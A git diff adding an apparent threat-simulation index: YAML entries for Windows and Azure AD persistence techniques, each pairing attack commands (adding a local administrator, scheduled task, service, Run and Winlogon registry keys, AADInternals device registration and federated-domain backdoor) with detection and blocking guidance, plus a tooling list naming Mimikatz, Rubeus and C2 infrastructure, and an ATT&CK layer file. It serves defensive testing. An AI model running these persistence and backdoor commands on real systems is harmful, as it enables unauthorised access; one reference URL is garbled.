+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- Antivirus
+- SIEM
+metadata:
+  id: b74ff4c5-eebf-466b-af85-341b19c4c748
+  tid: T1570
+  tactic: TA0008
+  x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+  isv: 1
diff --git a/h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
new file mode 100644
index 0000000..a58486f
--- /dev/null
+++ b/h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
@@ -0,0 +1,23 @@
+name: Register a new device in Azure AD
+description: Register a new device in Azure AD
+platforms:
+- azuread
+guidance:
+- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+block:
+- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+detect:
+- Detect anomalous device registration events by using Azure audit logs
+controls:
+- SIEM
+- Hardening
+metadata:
+  id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  tid: T1098.005
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - htpts://aadinternals.nom/post/prt/
+  x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  isv: 1
diff --git a/h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml b/h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
new file mode 100644
index 0000000..6a86c5e
--- /dev/null
+++ b/h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
@@ -0,0 +1,21 @@
+name: Persist via new local administrator
+description: Create a new local user then add them to the "Administrators" group using the builtin net.exe
+platforms:
+- windows
+guidance:
+- CMD> net user /add {{ username }} {{ password }}
+- CMD> net localgroup administrators {{ username }} /add
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use group modification events (Event ID 4728) to identify additions to local security groups.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+  tid: T1136.001
+  tactic: TA0003
+  x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+  isv: 1
diff --git a/h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
new file mode 100644
index 0000000..cd00901
--- /dev/null
+++ b/h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
@@ -0,0 +1,20 @@
+name: Persist via new scheduled task
+description: Persist on a system by creating a new scheduled task
+platforms:
+- windows
+guidance:
+- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  tid: T1053.005
+  tactic: TA0003
+  x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  isv: 1
diff --git a/h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
new file mode 100644
index 0000000..d43b8c9
--- /dev/null
+++ b/h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
@@ -0,0 +1,20 @@
+name: Persist via new Windows service
+description: Persist on a system by creating a new service
+platforms:
+- windows
+guidance:
+- CMD> sc create {{ service_name }} binPath= "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  tid: T1543.003
+  tactic: TA0003
+  x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  isv: 1
diff --git a/h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml b/h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
new file mode 100644
index 0000000..e7228e9
--- /dev/null
+++ b/h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
@@ -0,0 +1,20 @@
+name: Persist via Registry "Run" key
+description: Run a payload during user login and startup by setting a registry run key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+  tid: T1547.001
+  tactic: TA0003
+  x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+  isv: 1
diff --git a/h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
new file mode 100644
index 0000000..a323aaa
--- /dev/null
+++ b/h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
@@ -0,0 +1,20 @@
+name: Persist via Registry Winlogon Shell
+description: Run a payload during user login by setting a Registry Winlogon key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  tid: T1547.004
+  tactic: TA0003
+  x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  isv: 1
diff --git a/h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
new file mode 100644
index 0000000..0a122f8
--- /dev/null
+++ b/h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
@@ -0,0 +1,23 @@
+name: Configure a custom federated domain
+description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+platforms:
+- azuread
+guidance:
+- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+block:
+- ''
+detect:
+- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+controls:
+- SIEM
+metadata:
+  id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  tid: T1484.002
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - https://o365blog.com/post/aadbackdoor/
+  x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  isv: 1
diff --git a/indexes.json b/indexes.json
index bbf591e..5d08156 100644
--- a/indexes.json
+++ b/indexes.json
@@ -1,8 +1,9 @@
 {
     "indexes": {
-        "fs-index": "fs-index-2023/fs-index-2023-v1.2.yml",
-        "rh-index": "rh-index-2023/rh-index-2023-v1.2.yml",
-        "h-index": "h-index-2023/h-index-2023-v1.2.yml"
+        "fs-index": "fs-index-2024/fs-index-2024-v1.0.yml",
+        "rh-index": "rh-index-2024/rh-index-2024-v1.0.yml",
+        "h-index": "h-index-2024/h-index-2024-v1.0.yml",
+        "ot-index": "ot-index-2024/ot-index-2024-v1.0.yml"
     }
 }
 
diff --git a/ot-index-2024/CHANGELOG.md b/ot-index-2024/CHANGELOG.md
new file mode 100644
index 0000000..b5315fa
--- /dev/null
+++ b/ot-index-2024/CHANGELOG.md
@@ -0,0 +1,4 @@
+# v1.0 (January 2024)
+
+- Initial release
+
diff --git a/ot-index-2024/REQUIREMENTS.md b/ot-index-2024/REQUIREMENTS.md
new file mode 100644
index 0000000..09408ed
--- /dev/null
+++ b/ot-index-2024/REQUIREMENTS.md
@@ -0,0 +1,36 @@
+# Infrastructure
+
+- Mail server/relay to send emails
+- Proxy/VPN 
+- Proxy/VPN in non-standard geolocation
+- HTTP/S file hosting server 
+- Command-and-control server(s) with HTTPS and HTTP channels
+- Accounts for : Cloud storage provider (exfil), remote assistance service (if applicable)
+- Domain(s) and certificate(s) for infrastructure
+- MQTT broker
+
+## Payloads
+
+|#|Test Case|Payload|Notes|
+|---|---|---|---|
+|1|Attachment - ISO|ISO||
+|2|Link - Zipped DLL via sharing|DLL in zip||
+|3|Attachment - Macro|Macro-enabled Office document||
+|4|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template||
+|5|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes|
+|6|DLL execution using Rundll32|DLL||
+|7|Sideload a DLL into a legitimate application|DLL|can be shared with #6 as long as exported functions are as expected|
+|8|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL|
+|9|<Exfiltration>|Sensitive data|Use dlptest.com for sample data|
+
+# Tools/Scripts
+
+- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect
+- SharpHound : https://github.com/BloodHoundAD/SharpHound
+- AADInternals : https://github.com/Gerenios/AADInternals
+- Mimikatz : https://github.com/gentilkiwi/mimikatz
+- Rubeus : https://github.com/GhostPack/Rubeus
+- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+- Nanodump : https://github.com/fortra/nanodump
+- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI
+- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
diff --git a/ot-index-2024/ot-index-2024-v1.0-layer.json b/ot-index-2024/ot-index-2024-v1.0-layer.json
new file mode 100644
index 0000000..e3594f2
--- /dev/null
+++ b/ot-index-2024/ot-index-2024-v1.0-layer.json
@@ -0,0 +1,3184 @@
+{
+    "description": "Operational Technology Threat Simulation Index 2024 v1.0",
+    "domain": "enterprise-attack",
+    "layout": {
+        "layout": "flat"
+    },
+    "name": "Operational Technology Threat Simulation Index 2024 v1.0",
+    "selectSubtechniquesWithParent": false,
+    "selectTechniquesAcrossTactics": false,
+    "techniques": [
+        {
+            "enabled": false,
+            "techniqueID": "T1001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.005"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1013"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1017"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1018"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1019"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1022"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1023"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1024"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1025"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1026"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1028"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1029"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1030"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1031"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1032"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1033"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1034"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1035"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1038"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1039"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1040"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1041"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1042"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1043"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1044"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1045"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1046"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1046"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1047"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1048"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1048.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1049"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1050"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1051"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052.001"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1053"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1053.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1054"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1056"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1056.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1057"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1058"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1060"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1061"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1062"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1063"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1064"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1065"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1066"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1067"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1068"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1070"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1070.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.009"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1072"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1073"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1075"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1076"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1077"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1079"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1080"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1081"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1082"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1083"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1084"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1085"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1086"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1088"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1089"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1091"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1092"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1093"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1094"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1095"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1096"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1097"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1098"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1098.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1099"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1100"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1101"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1103"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1104"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1105"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1106"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1107"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1108"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1109"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1110"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1110.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1111"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1112"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1113"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.002"
+        },
